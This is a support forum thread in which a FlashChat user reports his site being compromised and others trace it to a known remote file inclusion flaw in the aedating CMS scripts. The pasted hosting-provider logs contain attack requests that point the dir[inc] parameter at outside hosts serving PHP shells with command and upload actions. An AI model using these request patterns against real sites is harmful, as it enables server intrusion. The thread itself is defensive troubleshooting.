Good morning.


I would like to first state that I have been using FlashChat quite successfully for some time. And now there is an issue that has dissallowed me from using it all together.

Someone is getting in through the chat and planting a sub site on the server that leads to a virus - I want to share with you the letter from my hosting provider:

Hello,

According to these logs your forum/chat script is being exploited heavily. You will need to update or remove this script from your account in order to prevent the hack. I've scanned your account for any PHP shells that may have been leftover.


187.24.133.35 /forum/chat/inc/cmses/form2.php?http://statesidelogistics.com/images/cliente.php?&action=cmd&chdir=/home/streder/public_html/forum/chat/inc/cmses/ 200
187.24.133.35 /forum/chat/inc/cmses/aedatingCMS2.php/chat/inc/cmses/aedatingCMS2.php?dir[inc]=http://63.249.200.230/diabolick.gif?&action=cmd&chdir=/home/streder/public_html/ 200
187.24.133.35 /forum/chat/inc/cmses/aedatingCMS2.php/chat/inc/cmses/aedatingCMS2.php?dir[inc]=http://63.249.200.230/diabolick.gif?&action=upload&chdir=/home/streder/public_html/ 200
187.24.133.35 /forum/chat/inc/cmses/aedatingCMS2.php/chat/inc/cmses/aedatingCMS2.php?dir[inc]=http://63.249.200.230/diabolick.gif? 200
187.24.133.35 /forum/chat/inc/cmses/aedatingCMS2.php/chat/inc/cmses/aedatingCMS.php?dir[inc]=http://63.249.200.230/diabolick.gif? 200
187.24.133.35 /forum/chat/inc/cmses/aedatingCMS2.php/chat/inc/cmses/aedating4CMS.php?dir[inc]=http://63.249.200.230/diabolick.gif? 200
187.24.133.35 /forum/chat/inc/cmses/aedatingCMS2.php/chat/inc/cmses/aedatingCMS2.php?dir[inc]=http://63.249.200.230/diabolick.gif?&action=upload&chdir=/home/streder/public_html/forum/chat/inc/cmses/ 200
187.24.133.35 /forum/chat/inc/cmses/aedatingCMS2.php/chat/inc/cmses/aedatingCMS2.php?dir[inc]=http://63.249.200.230/diabolick.gif??http://packs.by.ru/cmd/cmd2.gif?&action=cmd&chdir=/home/streder/public_html/ 200
187.24.133.35 /forum/chat/inc/cmses/aedatingCMS2.php/chat/inc/cmses/aedatingCMS2.php?dir[inc]=http://63.249.200.230/diabolick.gif?&action=cmd&chdir=/home/streder/public_html/ 200
187.24.133.35 /forum/chat/inc/cmses/aedatingCMS2.php/chat/inc/cmses/aedatingCMS2.php?dir[inc]=http://63.249.200.230/diabolick.gif?&action=cmd&chdir=/home/streder/public_html/ 200
187.24.133.35 /forum/chat/inc/cmses/aedatingCMS2.php/chat/inc/cmses/aedatingCMS2.php?dir[inc]=http://63.249.200.230/diabolick.gif?&action=cmd&chdir=/home/streder/public_html/ 200
187.24.133.35 /forum/chat/inc/cmses/aedatingCMS2.php/chat/inc/cmses/aedatingCMS2.php?dir[inc]=http://63.249.200.230/diabolick.gif?&action=cmd&chdir=/home/streder/public_html/ 200
187.25.146.122 /forum/chat/inc/cmses/aedatingCMS2.php/chat/inc/cmses/aedatingCMS2.php?dir[inc]=http://63.249.200.230/diabolick.gif??http://packs.by.ru/cmd/cmd2.gif?&action=cmd&chdir=/home/streder/public_html/ 200
187.25.146.122 /forum/chat/inc/cmses/aedatingCMS2.php/chat/inc/cmses/aedatingCMS2.php?dir[inc]=http://63.249.200.230/diabolick.gif??http://packs.by.ru/cmd/cmd2.gif?&action=cmd&chdir=/home/streder/public_html/ 200
187.25.146.122 /forum/chat/inc/cmses/aedatingCMS2.php/chat/inc/cmses/aedatingCMS2.php?dir[inc]=http://63.249.200.230/diabolick.gif??http://packs.by.ru/cmd/cmd2.gif?&action=cmd&chdir=/home/streder/public_html/ 200

Unless someone can suggest how I can fix this security issue, I will no longer be able to use the chat, and that makes me very sad.

Darren, any ideas?

I really want to be able to continue with your chat!

Thanks,

Steven

Also, please scan your servers for a folder called bradesco.com.br - this is the folder holding the sub site that leads to the virus.

S

Also, I should note this was running under version 505

S

Everything is pointing to the aedating cms files. I believe these were an issue at one point to where Darren just gave them names of .bak and now in later versions these files have been removed. So you can remove any files that relate to aedating from the chat/inc/cmses folder.

Those unsafe aedating files date from over two years ago (and were updated at the time of the exploit to stop the remote file inclusion) - how on earth did they get back into the release ??

Looking at the different FlashChat releases I have saved
the aedating CMS scripts have been available in the 2005 unsecure
versions since initial release of FlashChat version 5 in June 2008
and they were removed from the download with version 5.0.9 mid november 2008 :D

Using these early FlashChat version 5 releases
and updating to newer versions by uploading the new script files
will NOT remove these unsecure aedating CMS script files
which will result in FlashChat version 5.0.10 releases being unsecure too :D

Darren might have a good explanation why this have happened

This vulnerability was reported 2006-09-04 before FlashChat 4.6.2
and now is back into FlashChat version 5 :D

http://secunia.com/advisories/21756/

Description:
Multiple PHP remote file inclusion vulnerabilities in FlashChat before 4.6.2
allow remote attackers to execute arbitrary PHP code via a URL
in the dir[inc] parameter in
(1) inc/cmses/aedatingCMS.php,
(2) inc/cmses/aedatingCMS2.php, or
(3) inc/cmses/aedating4CMS.php.

Just to let you know - I updated to the latest version and so far have had no issues - I also changed the name of the folder the chat resides in.

I will continue to monitor for any issues, and will let you know if anything comes up.

S

another good idea would be once install has been done all cmses files not used by chat should be deleted from that folder and only the ones being used should be left remaining in there, i remove the ones i dont need and so far i have not had the issue above in quite some time